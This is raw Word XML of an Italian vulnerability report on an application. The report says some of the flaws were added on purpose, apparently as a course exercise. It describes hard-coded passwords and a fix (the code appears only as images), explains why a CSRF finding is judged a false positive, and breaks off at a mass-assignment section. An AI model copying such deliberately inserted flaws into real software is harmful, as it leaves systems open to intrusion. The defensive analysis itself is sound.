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CB7FB" w14:textId="76AEFBE4" w:rsidR="00491A55" w:rsidRDefault="00491A55" w:rsidP="00491A55">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491A55">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="004D43F9">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF784AD" w14:textId="77777777" w:rsidR="00792C82" w:rsidRDefault="00792C82" w:rsidP="00792C82"/>
    <w:p w14:paraId="1C5ADB68" w14:textId="350A6DE5" w:rsidR="00792C82" w:rsidRDefault="00792C82" w:rsidP="00792C82">
      <w:r>
        <w:t>Le prime nove vulnerabilità riportate riguardano quelle già presenti nell’applicazione originale, mentre dalla decima in poi sono descritte le vulnerabilità aggiunte successivamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DBBBA" w14:textId="646F2DBA" w:rsidR="00792C82" w:rsidRPr="00792C82" w:rsidRDefault="00792C82" w:rsidP="00792C82"/>
    <w:p w14:paraId="4C0D3F5D" w14:textId="1A407953" w:rsidR="00185FB3" w:rsidRPr="00185FB3" w:rsidRDefault="00491A55" w:rsidP="00185FB3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491A55">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hard coded password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF5F46" w14:textId="77777777" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="00185FB3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFD6A71" w14:textId="77777777" w:rsidR="00350230" w:rsidRDefault="00185FB3" w:rsidP="00185FB3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È una vulnerabilità introdotta durante l’implementazione del codice del backend e, se il codice è pubblico, chiunque può accedere a queste password, rendendo la vulnerabilità facilmente sfruttabile. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF8412" w14:textId="13EBED5B" w:rsidR="00491A55" w:rsidRDefault="00185FB3" w:rsidP="00185FB3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo caso l</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00491A55">
        <w:t xml:space="preserve"> password sono inserite in chiaro nel codice e quindi sono leggibili da chiunque</w:t>
      </w:r>
      <w:r w:rsidR="00DA7D75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E9C2D" w14:textId="77777777" w:rsidR="00350230" w:rsidRDefault="00350230" w:rsidP="00185FB3">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E822CEE" w14:textId="46C8DFDD" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>UserControllerTest.java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB848" w14:textId="73832039" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26739669" w14:textId="087811E3" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A140FFE" wp14:editId="0152E997">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5182870" cy="4857750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47494825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2870" cy="4857750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F46495B" w14:textId="4F3A90A1" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484B28C2" w14:textId="5F0F0B81" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48004EF4" w14:textId="36C5D51A" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4673D6EA" w14:textId="49300D10" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1919F4CF" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61788F0B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D33BE2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C68194" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E04167" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003D5867" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41878C88" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED33C22" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4E5A10" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D59E4E" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057DF4BB" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F68DFAA" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA2AF2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA45377" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD8A770" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E118670" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739CF506" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220E2C4B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00491A55">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDB4D28" w14:textId="646AFE7B" w:rsidR="000B2D9C" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fix</w:t>
      </w:r>
      <w:r w:rsidR="00491A55">
        <w:t xml:space="preserve">: usare un file in cui sono salvate le password, posseduto solo dall’admin in modo tale che solo lui rimane a conoscenza delle password. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> L’inserimento delle password è gestito da un PasswordManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A693D6F" w14:textId="47D76EF7" w:rsidR="00DA7D75" w:rsidRDefault="00185FB3" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B0F87B8" wp14:editId="40A0BAA5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>138430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6475095" cy="4731544"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="109838038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5095" cy="4731544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3572B2" w14:textId="1ABF9601" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00DA7D75"/>
    <w:p w14:paraId="213F1310" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0758173B" w14:textId="0BC60C6D" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184E0838" w14:textId="13137562" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5496FA" w14:textId="04B2B9CF" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE28D2C" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72247083" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6040CCA2" w14:textId="0D9AB0B7" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEE00CC" w14:textId="78882847" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4563EA36" w14:textId="5991F698" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60C6376B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1A8203" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C4506B" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D69123A" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E84B0A" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3400BFB1" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33DCE661" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2D06DC" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20021581" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10773918" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7EDE14" w14:textId="27ECEB71" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73323B82" w14:textId="2C89D63F" w:rsidR="00DA7D75" w:rsidRDefault="00185FB3" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7572B1B0" wp14:editId="0F315657">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4636251" cy="4021300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="135491197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6251" cy="4021300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E9F2FF" w14:textId="4950024E" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F3CC21" w14:textId="71322A33" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C07759" w14:textId="59FBDB2F" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4DE412" w14:textId="3C4159FD" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C92246" w14:textId="50B37971" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDDF422" w14:textId="0EAC702A" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7483FA4B" w14:textId="053F2C7C" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5952DE" w14:textId="0784EFA6" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B13464A" w14:textId="6CC6AF20" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398FB6D" w14:textId="2C19F09F" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15038A82" w14:textId="4A66816B" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E61860E" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB9CDE2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C125822" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="00185FB3"/>
    <w:p w14:paraId="33DACC9B" w14:textId="7787BD34" w:rsidR="000B2D9C" w:rsidRDefault="000B2D9C" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B2D9C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00D22103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ross-Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39281752" w14:textId="77777777" w:rsidR="00DE1106" w:rsidRPr="00DE1106" w:rsidRDefault="00DE1106" w:rsidP="00DE1106">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4E546C" w14:textId="6A9225F8" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>È un</w:t>
      </w:r>
      <w:r w:rsidR="00D22103">
        <w:t xml:space="preserve">a vulnerabilità </w:t>
      </w:r>
      <w:r>
        <w:t>dove l’utente finale viene forzato ad eseguire operazioni per conto dell’attaccante e quindi non volute su un’applicazione dove l’utente è autenticato. In particolare, potrebbe cambiare lo username o l’e-mail dell’utente oppure trasferire soldi sull’account dell’attaccante in caso di un utente normale. Nel caso di un utente amministratore invece potrebbe ottenere l’accesso all’intera app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12057196" w14:textId="77777777" w:rsidR="00DE1106" w:rsidRDefault="00DE1106" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AC52B5" w14:textId="64EF7F08" w:rsidR="000B2D9C" w:rsidRDefault="00DE1106" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nel</w:t>
      </w:r>
      <w:r w:rsidR="006D5B67">
        <w:t>a nostra app</w:t>
      </w:r>
      <w:r>
        <w:t>, CSRF è disabilitato poiché l’autenticazione avviene tramite Bearer Token, i quali non sono automaticamente inclusi nelle richieste Cross-Site. Di fatti, a differenza dei cookie di sessione, questi Token non vengono inviati automaticamente dal browser con ogni richiesta, bensì devono essere inclusi esplicitamente nell’Authorization Header della richiesta http. Inoltre l’applicazione fa uso di una politica CORS che accetta richieste soltanto da domini specifici, rendendo quindi la vulnerabilità un falso positivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020AC84" w14:textId="77777777" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383AB5DE" w14:textId="6700193E" w:rsidR="005D725F" w:rsidRPr="005D725F" w:rsidRDefault="005D725F" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D725F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mass assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C229D" w14:textId="77777777" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F9BC21" w14:textId="40870D75" w:rsidR="00B508DA" w:rsidRDefault="00B508DA" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
